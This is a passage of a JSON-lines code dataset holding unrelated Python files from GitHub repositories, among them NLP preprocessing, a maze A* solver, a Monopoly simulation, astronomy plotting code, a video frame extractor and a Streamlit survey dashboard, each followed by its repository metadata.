os.listdir('./LQ/3/'):\n os.remove('./LQ/3/' + file)\n for file in os.listdir('../RealSR/results/Sharpic-SR/DIV2K/'):\n os.remove('../RealSR/results/Sharpic-SR/DIV2K/' + file)\n for file in os.listdir('../BOPB/result/old/final_output/'):\n os.remove('../BOPB/result/old/final_output/' + file)\n for file in os.listdir('../BOPB/result/old_w_scratch/final_output/'):\n os.remove('../BOPB/result/old_w_scratch/final_output/' + file)\n for file in os.listdir('../waifu2x/results/'):\n os.remove('../waifu2x/results/' + file)\n","repo_name":"GCU-Sharpic/sharpic-imagesr","sub_path":"connects/databases/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":8829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35762263255","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n# @Project :BiLSTM_CRF\n# @File :processing\n# @Date :2021/7/12 20:59\n# @Author :huangjie\n# @Email :728155808@qq.com\n# @Software :PyCharm\n-------------------------------------------------\n\"\"\"\nimport json\n\ndef read_data(fn):\n all_data = []\n with open(fn,\"r\",encoding=\"utf-8\") as f:\n lines = f.readlines()\n s = \"\"\n bio = []\n for line in lines:\n if line == \"\\n\":\n all_data.append({\"text\":s,\"tags\":bio})\n s = \"\"\n bio = []\n continue\n char,tag = line.strip(\"\\n\").split(\" \")\n s += char\n bio.append(tag)\n return all_data\n\ndef generate_scheams(data):\n rel2id = {\"O\":0}\n id2rel = {0:\"O\"}\n for i in data:\n for t in i[\"tags\"]:\n if t not in rel2id:\n rel2id[t] = len(rel2id)\n id2rel[len(id2rel)] = t\n return rel2id,id2rel\n\ndef get_vocab(train_json):\n vocab = 
{\"pad\":0,\"unk\":1}\n data = json.load(open(train_json,\"r\",encoding=\"utf-8\"))\n for i in data:\n text = i[\"text\"]\n for char in list(text):\n if char not in vocab:\n vocab[char] = len(vocab)\n return vocab\nif __name__ == '__main__':\n file = \"../data/test.char.bmes\"\n data = get_vocab(\"../dataset/train_data.json\")\n json.dump(data,open(\"../dataset/vocab.json\",\"w\",encoding=\"utf-8\"),indent=4,ensure_ascii=False)\n\n","repo_name":"huangjie-nlp/BiLSTMCRF","sub_path":"processing/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"24236831827","text":"from github import Github\nimport json, os\n\nclass GetRepo:\n def __init__(self, acc_tok):\n self.g = Github(\"{}\". format(acc_tok))\n self.emp_dict = {}\n def repo_getter(self):\n for rep in self.g.get_user().get_repos():\n try:\n dict_data = rep.get_languages()\n self.emp_dict.update(dict_data)\n except Exception as e: \n print(e) \n def get_keyval(self):\n for repo in self.g.get_user().get_repos():\n data = repo.get_languages() #placeholder for for dict \n \n for key in data: #Iterating through the dict to print individual values\n \n value = data[key] #value being set to get the value of key\n self.emp_dict[key] = self.emp_dict[key] + value \n","repo_name":"karanpatel3/GitHub-Repository-Scraper-Backend","sub_path":"GitHubScraper.py","file_name":"GitHubScraper.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"322912357","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ntry:\n # Python 3\n from urllib import request\nexcept ImportError:\n # Python 2\n import urllib2 as request\nimport sys\n\nfrom bs4 import BeautifulSoup\n\nimport re\nfrom urllib.parse import urlparse\nimport urllib.request\n\nimport json\n\ndef main():\n args = sys.argv\n url = 'https://www.google.co.jp/search?tbm=isch&q='+args[1]\n regex = r'[^\\x00-\\x7F]'\n matchedList = re.findall(regex,url)\n for m in matchedList:\n url = url.replace(m, urllib.parse.quote_plus(m, encoding=\"utf-8\"))\n\n #print(url)\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\",\n }\n\n request = urllib.request.Request(url=url, headers=headers)\n response = urllib.request.urlopen(request)\n body = response.read()\n\n #print(body)\n\n # HTML をパースする\n soup = BeautifulSoup(body, \"lxml\")\n\n div_tags = soup.find_all('div', {'class': 'rg_meta'})\n for div_tag in div_tags:\n j = json.loads(div_tag.text)\n print(j[\"ou\"])\n\nif __name__ == '__main__':\n main()","repo_name":"ConohaKaede/ml","sub_path":"image_urls/image_urls_from_google.py","file_name":"image_urls_from_google.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36551482659","text":"import numpy as np\nfrom heapq import heappush, heappop\nfrom animation import draw\nimport argparse\n\nclass Node():\n \"\"\"\n cost_from_start - the cost of reaching this node from the starting node\n state - the state (row,col)\n parent - the parent node of this node, default as None\n \"\"\"\n def __init__(self, state, cost_from_start, parent = None):\n self.state = state\n self.parent = parent\n self.cost_from_start = cost_from_start\n\n\nclass Maze():\n \n def __init__(self, map, start_state, goal_state, map_index):\n 
self.start_state = start_state\n self.goal_state = goal_state\n self.map = map\n self.visited = [] # state\n self.m, self.n = map.shape \n self.map_index = map_index\n\n def draw(self, node):\n path=[]\n while node.parent:\n path.append(node.state)\n node = node.parent\n path.append(self.start_state)\n \n draw(self.map, path[::-1], self.map_index)\n\n def goal_test(self, current_state):\n if current_state == self.goal_state:\n return True\n return False\n\n def get_cost(self, current_state, next_state):\n return 1\n\n def get_successors(self, state):\n direction_rows = [0, 0, -1, 1]\n direction_columns = [-1, 1, 0, 0]\n state_row = state[0]\n state_column = state[1]\n successors = []\n\n for i in range(4):\n new_row = state_row + direction_rows[i]\n new_column = state_column + direction_columns[i]\n if self.map[new_row, new_column] != 0.0:\n successors.append((state[0] + direction_rows[i], state[1] + direction_columns[i]))\n\n return successors\n\n # heuristics function\n def heuristics(self, state):\n return abs(state[0] - self.goal_state[0]) + abs(state[1] - self.goal_state[1])\n\n # priority of node \n def priority(self, node):\n return node.cost_from_start + self.heuristics(node.state)\n\n # solve it\n def solve(self):\n if self.goal_test(self.start_state):\n return\n\n self.visited.append(self.start_state)\n first_node = Node(self.start_state, 0, None)\n count = 0\n priority_queue = [(self.priority(first_node), count, first_node)]\n\n while priority_queue:\n best_node = heappop(priority_queue)[2]\n\n successors = self.get_successors(best_node.state)\n\n for successor in successors:\n if successor in self.visited:\n continue\n self.visited.append(successor)\n\n next_node = Node(successor, best_node.cost_from_start + self.get_cost(best_node.state, successor), best_node)\n if self.goal_test(successor):\n self.draw(next_node)\n return\n count += 1\n heappush(priority_queue, (self.priority(next_node), count, next_node))\n\n \nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='maze')\n parser.add_argument('-index', dest='index', required = True, type = int)\n index = parser.parse_args().index\n\n # Example:\n # Run this in the terminal solving map 1\n # python maze_astar.py -index 1\n \n data = np.load('map_'+str(index)+'.npz')\n map, start_state, goal_state = data['map'], tuple(data['start']), tuple(data['goal'])\n\n game = Maze(map, start_state, goal_state, index)\n game.solve()\n ","repo_name":"Nathan-Hutton/Maze-AStar","sub_path":"maze_astar.py","file_name":"maze_astar.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15904511396","text":"from random import *\nfrom colorama import Fore, Style\nfrom copy import deepcopy\ntotals = []\nspaces = [\n\t\"go\",\"brown1\",\"chest\",\"brown2\",\"incTax\",\"rail1\",\"lightBlue1\",\"chance\",\"lightBlue2\",\"lightBlue3\", # First Row\n\t\"visitJail\",\"purple1\",\"electric\",\"purple2\",\"purple3\",\"rail2\",\"orange1\",\"chest\",\"orange2\",\"orange3\", # Second Row\n\t\"parking\",\"red1\",\"chance\",\"red2\",\"red3\",\"rail3\",\"yellow1\",\"yellow2\",\"water\",\"yellow3\", # Third Row\n\t\"toJail\",\"green1\",\"green2\",\"chest\",\"green3\",\"rail4\",\"chance\",\"blue1\",\"luxTax\",\"blue2\" # Final Row\n]\n\nchestcards = [\n\t\"gotoGo\",\"gotoJail\",\n\t\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\"\n]\nchancecards = 
[\n\t\"back3\",\"gotoGo\",\"gotoJail\",\"gotoR3\",\"gotoP1\",\"gotoB2\",\"gotoRail\",\"gotoRail\",\"gotoUtil\",\"gotoRail1\",\n\t\"exitJail\",\"money\",\"money\",\"money\",\"money\",\"money\"\n]\n\nfor x in range(len(spaces)):\n\ttotals.append(0)\n\n\n\t\nclass player(object):\n\tspace=0\n\tmoney=0\n\n\n\n\n\tdef roll(self):\n\n\t\trolled = getroll()\n\t\tself.space += rolled\n\t\tif self.space > (len(spaces)-1):\n\t\t\tself.space -= (len(spaces))\n\n\t\t\n\n\t\t\n\n\t\tif spaces[self.space] == \"chance\":\n\t\t\tself.chance()\n\t\t\t#pass\n\n\t\tif spaces[self.space] == \"chest\":\n\t\t\tself.chest()\n\t\t\t#pass\n\n\t\tspacesout[self.space] += 1\n\n\n\t\tif self.space == 30: # The to jail space\n\t\t\tself.space = 10\n\t\t\n\n\n\n\n\n\tdef chance(self):\n\t\t#\"back3\",\"gotoGo\",\"gotoJail\",\"gotoR3\",\"gotoP1\",\"gotoB2\",\"gotoRail\",\"gotoRail\",\"gotoUtil\",\"gotoRail1\"\n\t\trcard = chancecurrent.pop(0)\n\t\tchancecurrent.append(rcard)\n\t\t#rcard = randint(1,16)\n\t\tif rcard == \"gotoGo\":\n\t\t\tself.space = 0\n\n\t\telif rcard == \"gotoR3\":\n\t\t\tself.space = spaces.index(\"red3\")\n\n\t\telif rcard == \"gotoP1\":\n\t\t\tself.space = spaces.index(\"purple1\")\n\n\t\telif rcard == \"gotoUtil\":\n\t\t\tspace1 = spaces.index(\"water\")\n\t\t\tspace2 = spaces.index(\"electric\")\n\t\t\td1 = abs(self.space-space1)\n\t\t\td2 = abs(self.space-space2)\n\t\t\tif d1 > d2:\n\t\t\t\tself.space = space1\n\t\t\telse:\n\t\t\t\tself.space = space2\n\n\t\telif rcard == \"gotoRail\":\n\t\t\tspace1 = spaces.index(\"rail1\")\n\t\t\tspace2 = spaces.index(\"rail2\")\n\t\t\tspace3 = spaces.index(\"rail3\")\n\t\t\tspace4 = spaces.index(\"rail4\") \n\t\t\td1 = abs(self.space-space1)\n\t\t\td2 = abs(self.space-space2)\n\t\t\td3 = abs(self.space-space3)\n\t\t\td4 = abs(self.space-space4)\n\t\t\ttrains = [d1,d2,d3,d4]\n\t\t\tgoto = min(trains)\n\t\t\tself.space = abs(self.space-goto)\n\n\t\telif rcard == \"back3\":\n\t\t\tself.space = self.space - 3\n\t\t\tif self.space < 0:\n\t\t\t\tself.space += (len(spaces))\n\n\t\telif rcard == \"gotoJail\":\n\t\t\tself.space = 10\n\n\t\telif rcard == \"gotoRail1\":\n\t\t\tself.space = spaces.index(\"rail1\")\n\n\t\telif rcard == \"gotoB2\":\n\t\t\tself.space = spaces.index(\"blue2\")\n\n\n\tdef chest(self):\n\t\tcCard = chestcards.pop(0)\n\t\tif cCard == \"gotoGo\":\n\t\t\tself.space = 0\n\t\tif cCard == \"gotoJail\":\n\t\t\tself.space = 10\n\t\tchestcards.append(cCard)\n\t\t#cCard = randint(1,16)\n\t\t#if cCard == 1:\n\t\t#\tself.space = 0\n\t\t#elif cCard == 2:\n\t\t#\tself.space = 10\n\n\t\t#print(self.space)\n\t\t#print(spaces[self.space])\n\n\n\n\n\n\n\ndef getroll():\n\t#droll = randint(1,6)\n\t#droll2 = randint(1,6)\n\t#froll = droll+droll2\n\tdice1 = [1,2,3,4,5,6]\n\tdice2 = [1,2,3,4,5,6]\n\tshuffle(dice1)\n\tshuffle(dice2)\n\trandindex = randint(0,5)\n\trandindex2 = randint(0,5)\n\tfroll = dice1[randindex] + dice2[randindex2]\n\treturn froll\n\np1 = player()\np2 = player()\np3 = player()\np4 = player()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfor g in range(50): # Run 10 games\n\n\t#print(spaces)\n\n\tspacesout = []\n\n\tfor x in range(len(spaces)):\n\t\tspacesout.append(0)\n\n\n\tchestcurrent = deepcopy(chestcards)\n\tshuffle(chestcurrent)\n\tchancecurrent = deepcopy(chancecards)\n\tshuffle(chancecurrent)\n\t#print(chancecurrent)\n\t#print(chestcurrent)\n\n\tp1.space = 0\n\tp2.space = 0\n\tp3.space = 0\n\tp4.space = 0\n\t\n\n\tfor x in range(75):\n\t\tp1.roll()\n\t\tp2.roll()\n\t\tp3.roll()\n\t\tp4.roll()\n\n\toutput = f\"Spaces of game {g+1}: 
\"\n\tfor x in range(len(spaces)):\n\t\toutput += f\"{Fore.GREEN}{spaces[x]}{Style.RESET_ALL}:{Fore.RED}{spacesout[x]}{Style.RESET_ALL}, \"\n\n\n\tprint(output)\n\n\n\tfor x in range(len(spacesout)):\n\t\ttotals[x] += spacesout[x]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nspacesN = deepcopy(spaces)\ntotalsN = deepcopy(totals)\n\noutput = \"Final Spaces: \"\nfor x in range(len(spaces)):\n\toutput += f\"{Fore.GREEN}{spaces[x]}{Style.RESET_ALL}:{Fore.RED}{totals[x]}{Style.RESET_ALL}, \"\n\nprint(\"\\n\\n\\n\")\nprint(output)\nprint(\"\\n\")\nhighest = max(totals)\nindex = totals.index(highest)\nprint(f\"Highest Value is: {highest} on {spaces[index]}\")\ntotals.pop(index)\nspaces.pop(index)\n\nhighest = max(totals)\nindex = totals.index(highest)\nprint(f\"Second Greatest Value is: {highest} on {spaces[index]}\")\ntotals.pop(index)\nspaces.pop(index)\n\nhighest = max(totals)\nindex = totals.index(highest)\nprint(f\"Third Greatest Value is: {highest} on {spaces[index]}\")\ntotals.pop(index)\nspaces.pop(index)\n\n'''\nspaces = [\n\t\"go\",\"brown1\",\"chest\",\"brown2\",\"incTax\",\"rail1\",\"lightBlue1\",\"chance\",\"lightBlue2\",\"lightBlue3\", # First Row\n\t\"visitJail\",\"purple1\",\"electric\",\"purple2\",\"purple3\",\"rail2\",\"orange1\",\"chest\",\"orange2\",\"orange3\", # Second Row\n\t\"parking\",\"red1\",\"chance\",\"red2\",\"red3\",\"rail3\",\"yellow1\",\"yellow2\",\"water\",\"yellow3\", # Third Row\n\t\"toJail\",\"green1\",\"green2\",\"chest\",\"green3\",\"rail4\",\"chance\",\"blue1\",\"luxTax\",\"blue2\" # Final Row\n]\n'''\nbrown = 0\nrail = 0\nlightBlue = 0\npurple = 0\nutil = 0\norange = 0\nred = 0\nyellow = 0\ngreen = 0\nblue = 0\nfor x in spacesN:\n\tif \"brown\" in x:\n\t\tbrown += totalsN[spacesN.index(x)]\n\telif \"rail\" in x:\n\t\trail += totalsN[spacesN.index(x)]\n\telif \"lightBlue\" in x:\n\t\tlightBlue += totalsN[spacesN.index(x)]\n\telif \"purple\" in x:\n\t\tpurple += totalsN[spacesN.index(x)]\n\telif \"electric\" == x or \"water\" == x:\n\t\tutil += totalsN[spacesN.index(x)]\n\telif \"orange\" in x:\n\t\torange += totalsN[spacesN.index(x)]\n\telif \"red\" in x:\n\t\tred += totalsN[spacesN.index(x)]\n\telif \"yellow\" in x:\n\t\tyellow += totalsN[spacesN.index(x)]\n\telif \"green\" in x:\n\t\tgreen += totalsN[spacesN.index(x)]\n\telif \"blue\" in x:\n\t\tblue += totalsN[spacesN.index(x)]\n\noutput = \"\\n\\n\\nTOTALS: \"\n\noutput += f\"Brown:{Fore.BLACK}{brown}{Style.RESET_ALL}, \"\noutput += f\"Rail:{Fore.CYAN}{rail}{Style.RESET_ALL}, \"\noutput += f\"Light Blue:{Fore.BLUE}{lightBlue}{Style.RESET_ALL}, \"\noutput += f\"Purple:{Fore.MAGENTA}{purple}{Style.RESET_ALL}, \"\noutput += f\"Util:{Fore.CYAN}{util}{Style.RESET_ALL}, \"\noutput += f\"Orange:{Fore.YELLOW}{orange}{Style.RESET_ALL}, \"\noutput += f\"Red:{Fore.RED}{red}{Style.RESET_ALL}, \"\noutput += f\"Yellow:{Fore.YELLOW}{yellow}{Style.RESET_ALL}, \"\noutput += f\"Green:{Fore.GREEN}{green}{Style.RESET_ALL}, \"\noutput += f\"Blue:{Fore.BLUE}{blue}{Style.RESET_ALL}\"\n\nprint(output)\n\nfinalresults = [brown,rail,lightBlue,purple,util,orange,red,yellow,green,blue]\nfinalresultscolors = [\"brown\",\"rail\",\"lightBlue\",\"purple\",\"util\",\"orange\",\"red\",\"yellow\",\"green\",\"blue\"]\n\n\nprint(\"\\n\")\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Highest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)\n\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Second Greatest Value is: {highest} on 
{finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)\n\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Third Greatest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)\n\n\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Fourth Greatest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)","repo_name":"MathIAStuff/MathExploration","sub_path":"mathExploration.py","file_name":"mathExploration.py","file_ext":"py","file_size_in_byte":7383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72224365695","text":"import numpy as np\nimport pickle\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport utils\nfrom scipy import stats\nfrom filter import *\n\n'''\nThis code plots a bunch of explorative plots. Elements that are plotted are, amongst others, histogram distributions of systematic parameters, 2D histograms of ngal vs. a systematic parameter, \na correlation plot, the binned ngal vs. systematic parameter plots.\n'''\n\n#data_dir = utils.dat_dir()\ndata_dir = '/disks/shear12/dombrovskij/systematic_maps/data/'\n#graph_dir = utils.fig_dir()\ngraph_dir = '/disks/shear12/dombrovskij/systematic_maps/graphs/'\n\nwith open(data_dir+'/pixel_data.pickle', 'rb') as handle:\n\tpixel_data = pickle.load(handle)\n\t \nprint('Parameters: {}'.format(pixel_data.columns))\n\ntemp = fraction_lim(pixel_data, frac_lim=0.1) #Only use pixels with fraction higher than 0.1\n\nuse_cols = [x for x in pixel_data.columns if (x != 'fraction') & (x != 'ngal_norm')]\t\t\n \n#filtered_pixel_data = percentile_cuts(temp, use_cols, low_cut=5, high_cut=95, verbose=True) #Perform percentile cuts on all use_cols (currently doesn't remove any datapoints)\t\n\nX = pixel_data[use_cols].copy()\nY = pixel_data['ngal_norm'].values\nZ = pixel_data['fraction'].values\n\nprint('Number of zeros: {}'.format(len(np.where(Y==0)[0])))\n\ndef plot_hist_single(data, bins=20, lw=2, log=False, ylim = None, cumulative = False, x_label='', y_label='', title=None):\n\n\t'''\n\tPlot a single histogram of the input data (should contain only 1 parameter).\n\t'''\n\n\tf, ax = plt.subplots(figsize=(9,7))\n\t\n\tplt.hist(data, bins=bins, histtype='step', cumulative=cumulative, lw=lw, color='black')\n\t\n\tif log:\n\t\tax.set_yscale('log')\n\t\t\n\tif ylim:\n\t\tax.set_ylim(ylim)\n\t\n\tplt.xticks(fontsize=18)\n\tplt.yticks(fontsize=18)\n\t\n\tplt.xlabel(x_label, fontsize=18)\n\tplt.ylabel(y_label, fontsize=18)\n\t\n\tplt.tight_layout()\n\tplt.show()\n\tif title:\n\t\tf.savefig(graph_dir+'data_exploration/'+title+'.png')\n\t\n\treturn None\n\ndef plot_hist(pixel_data):\n\n\t'''\n\treturns a multi-panel panel plot with each panel showing \n\tthe histogram of a systematic parameter\n\t'''\n\t\n\t#cols = [x for x in pixel_data.columns if 'fraction' not in x]\n\tcols = pixel_data.columns\n\tncols = len(cols)\n\n\tnr, nc = len(cols)/3, 3\n\tfig , axs = plt.subplots(nrows= nr, ncols= nc , sharex= False, sharey= False, figsize= (15,10))\n\tcnt = 0\n\tfor i in range(nr):\n\t\tfor j in range(nc):\n\n\t \t\thist = axs[i,j].hist(pixel_data[cols[cnt]], bins= 20, histtype= \"step\")\n\t \t\taxs[i,j].set_xlabel(cols[cnt])\n\t \t\taxs[i,j].set_ylabel(\"counts\")\n\t \t\tcnt+=1\n\tplt.tight_layout()\n\tplt.savefig(graph_dir+\"data_exploration/sys_hist.png\")\t \n\n\treturn 
None\n\t\ndef plot_2dhist(X,Y, bins=100, y_lim = None):\n\n\t'''\n\tReturns a multi-panel plot with each panel showing the 2d histogram of a systematic parameter\n\twith the normalized galaxy density\n\t'''\n\n\tcols = X.columns\n\tncols = len(cols)\n\n\tnr, nc = len(cols)/3, 3\n\tfig, axs = plt.subplots(nrows=nr, ncols=nc, sharex=False, sharey=True, figsize=(15,10))\n\tcnt = 0\n\n\tfor i in range(nr):\n\t\tfor j in range(nc):\n\t\t\n\t\t\ty = Y\n\t\t\tx = X[cols[cnt]]\n\n\t\t\tcounts, xedges, yedges, im = axs[i,j].hist2d(x,y, bins=bins)\n\t\t\t#plt.colorbar(im, ax=axs[i,j])\n\n\n\t\t\taxs[i,j].set_xlabel(cols[cnt], fontsize=14)\n\t\t\taxs[i,j].set_ylabel(r\"$n_{\\rm gal}/\\bar{n}_{\\rm gal}$\", fontsize=14)\n\n\t\t\tcnt += 1\n\n\tplt.tight_layout()\n\tfig.subplots_adjust(top=0.88)\n\t\n\tif y_lim:\n\t\tplt.ylim(y_lim)\n\tplt.savefig(graph_dir+\"data_exploration/sys_2dhist.png\")\t \n\tplt.show()\n\t\n\treturn None\n\t\ndef plot_scatter(X,Y, s=15, xlim = None, ylim = None, x_label='', y_label='', title='temp'):\n\n\t'''\n\tCreates scatterplot of Y vs. X. \n\t'''\n\n\tf, ax = plt.subplots(figsize=(9,7))\n\t\n\tplt.scatter(X, Y, s=s, color='black')\n\t\n\tif xlim:\n\t\tax.set_xlim(xlim)\n\t\t\n\tif ylim:\n\t\tax.set_ylim(ylim)\n\t\n\tplt.xticks(fontsize=18)\n\tplt.yticks(fontsize=18)\n\t\n\tplt.xlabel(x_label, fontsize=18)\n\tplt.ylabel(y_label, fontsize=18)\n\t\n\tplt.tight_layout()\n\tplt.show()\n\tf.savefig(graph_dir+'data_exploration/'+title+'.png')\n\t\n\treturn None\n\ndef plot_corr(X):\n\n\n\t'''\n\treturns a correlation matrix \n\tof the systematic parameters\n\tinput: pixel_data\n\t'''\n\t\n\tcorr = X.corr() #compute the correlation matrix\n\n\t# Generate a mask for the upper triangle\n\tmask = np.zeros_like(corr, dtype=np.bool)\n\tmask[np.triu_indices_from(mask)] = True\n\n\t# Set up the matplotlib figure\n\tf, ax = plt.subplots(figsize=(11, 9))\n\n\t# Generate a custom diverging colormap\n\tcmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n\t# Draw the heatmap with the mask and correct aspect ratio\n\tsns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,\n\t square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\n\n\tf.savefig(graph_dir+\"data_exploration/sys_corr.png\")\t \n\n\treturn None\n\ndef plot_ngal(ngal_norm, pixel_data, pixel_fraction, nbins, percut, average_mode = 'median', title=None):\n\n\t'''\n\treturns a multipanel figure, with each panel \n\tshowing the trend between the normalized \n\tgal number density and a systematic parameters\n\tInputs: \n\t ngal_norm = normalized ngal,\n\t averge_mode = if 'mean', then the mean density in each bin is computed\n\t\t if 'median', then the median density in each bin is computed\n\t \t default: 'median'\n\t pixel_data = a dataframe with the same number of rows as \n\t ngals, each column correspond to a systematic parameter;\n\t nbins + number of bins for making the plots\n\t percut = a tuple containing the desired lower and upper \n\t percentile cuts to be applied to the systematic parameters\n\t'''\n\t\n\tcols = pixel_data.columns\n\tncols = len(cols)\n\n\tnr, nc = len(cols)/3, 3\n\tfig , axs = plt.subplots(nrows= nr, ncols= nc , sharex= False, sharey= False, figsize= (15,10))\n\tcnt = 0\n\tfor i in range(nr):\n\t\tfor j in range(nc):\n\n\t\t\ty = ngal_norm\n\t\t\tx = pixel_data[cols[cnt]]\n\t\t\tz = pixel_fraction\n\n\t\t\t# Compute the upper and lower percentile cuts\n\t\t\tpercs = np.percentile(x, [percut[0], percut[1]])\n\n\t\t\t# Define a mask based on the percentile cuts\n\t\t\tmask = (x>percs[0])&(x ',dst)\n # 
shutil.copy(src, dst)\n # j += 1\n #\n # i += limit\n # print()\n\n # single_frames_path = os.path.join(path, video[\"name\"].split('.mp4')[0])\n # for src in list(paths.list_images(single_frames_path)):\n # dst = data_path + fr'\\{i:05d}.jpg'\n # print(dst)\n # shutil.copy(src, dst)\n # i += 1\n\n frames_num = 0\n values = list(video.values())[1:]\n for value in values:\n frames_num += (value[1] - value[0])\n\n frames_num = frames_num // interval\n print(frames_num)\n\n video_path = os.path.join(videos_path, video[\"name\"])\n cap = cv2.VideoCapture(video_path)\n\n print(video_path)\n j = 0\n k = 0\n while cap.isOpened():\n _, image = cap.read()\n resized_img = image[260:, :, :]\n resized_img = cv2.copyMakeBorder(resized_img, 20, 0, 0, 0, cv2.BORDER_REPLICATE)\n\n img_path = data_path + fr'\\{i:05d}.jpg'\n\n if values[k][0] < j <= values[k][1] and j%interval==0:\n if np.any(image):\n if not os.path.exists(img_path):\n cv2.imwrite(img_path, resized_img)\n\n print(f'{j}, {i:05d}, copy')\n i += 1\n else:\n print(f'{j}, {i:05d}, already exists')\n i += 1\n else:\n print('corrupt image')\n\n if j > values[k][1]:\n print('k+1, k=', k)\n print(f'{values[k][0]}')\n k += 1\n\n\n if j > values[-1][1]:\n print('break')\n break\n\n if i == 30:\n break\n\n j += 1\n print('new dict')\n\n\ndef sort_path(path):\n sorted_path = []\n for file in os.listdir(path):\n number = int(''.join(n for n in file if n.isdigit()))\n sorted_path.append(number)\n\n sorted_path = sorted(sorted_path)\n return [path + fr'\\{str(f)}.jpg' for f in sorted_path]\n\n# i = 0\n# for src in sort_path(video1_path):\n# dst = os.path.join(data_path, f'{i:05d}.jpg')\n# shutil.copy(src, dst)\n# i += 1\n\n# test_idx = 0\n# for train_idx, train_img in enumerate(sorted_train):\n# if train_idx>=train_size:\n# test_img = test_path + fr'\\{test_idx}.jpg'\n# print(train_idx, train_img, '->', test_img)\n# os.replace(train_img, test_img)\n# test_idx += 1\n","repo_name":"MacApos/Road_Signs_Classification","sub_path":"lane_detection3/Archive/video_to_jpg_05.21.py","file_name":"video_to_jpg_05.21.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74073399934","text":"import streamlit as st\nimport pandas as pd\nfrom utils import query_gbq, highlight_by_column\n\n\ndef main():\n \"\"\"\n main\n \"\"\"\n\n satis_estacoes = query_gbq(\n \"\"\"\n select \n t1.*,\n trim(split(seriedade, '(')[safe_offset(0)]) seriedade_simples,\n t2.nome_exibicao_responsavel\n from `rj-smtr.brt_manutencao.questionario_recentes` t1\n join `rj-smtr.brt_manutencao.responsaveis` t2\n on t1.id_responsavel = t2.id_responsavel\n \"\"\",\n update=3,\n )\n\n satis_estacoes[\"nome_problema_simples\"] = satis_estacoes[\"nome_problema\"].apply(\n lambda x: x.split(\"(\")[0]\n )\n\n responsavel = st.selectbox(\n \"Selecione um responsavel\",\n satis_estacoes[\"nome_exibicao_responsavel\"].sort_values().unique(),\n )\n\n nome_problema = st.selectbox(\n \"Selecione um problema\",\n satis_estacoes.query(f\"nome_exibicao_responsavel == '{responsavel}'\")[\n \"nome_problema_simples\"\n ]\n .sort_values()\n .unique(),\n )\n\n problema = satis_estacoes.query(\n f\"nome_exibicao_responsavel == '{responsavel}'\"\n ).query(f'nome_problema_simples == \"{nome_problema}\"')\n\n st.subheader(\"Avaliações\")\n\n filterby = [\"Urgência\", \"Insatisfatório\"]\n problemas_selecionados = problema[problema[\"seriedade_simples\"].isin(filterby)]\n\n if len(problemas_selecionados):\n\n st.dataframe(\n 
problemas_selecionados.groupby(\"seriedade_simples\")\n .count()[[\"dt\"]]\n .T.assign(hack=\"\")\n .set_index(\"hack\")\n )\n\n entorno = (\n problemas_selecionados.query('categoria_problema == \"Externo\"')\n .rename(\n columns={\n \"nome_estacao\": \"Estação\",\n \"seriedade_simples\": \"Status\",\n }\n )\n .sort_values(by=\"Status\", ascending=False)\n .set_index(\"Estação\")[[\"Status\"]]\n )\n\n if len(entorno):\n st.subheader(\"Estação Entorno\")\n\n st.dataframe(highlight_by_column(entorno, \"Status\"))\n\n dentro = (\n problemas_selecionados.query('categoria_problema == \"Interno\"')\n .rename(\n columns={\n \"nome_estacao\": \"Estação\",\n \"seriedade_simples\": \"Status\",\n }\n )\n .sort_values(by=\"Status\", ascending=False)\n .set_index(\"Estação\")[[\"Status\"]]\n )\n\n if len(dentro):\n\n st.subheader(\"Estação Dentro\")\n\n st.dataframe(highlight_by_column(dentro, \"Status\"))\n else:\n\n st.warning(f\"Não existem avaliações negativas\")","repo_name":"RJ-SMTR/brt_avaliacao","sub_path":"app/responsavel.py","file_name":"responsavel.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30881847831","text":"import os, time\nfrom concurrent.futures import ThreadPoolExecutor\n\nprint(\"hi outside of main()\")\n\ndef hello(x):\n print(\"inside hello()\")\n print(\"Proccess id: \", os.getpid())\n time.sleep(3)\n return x*x\n\nif __name__ == \"__main__\":\n 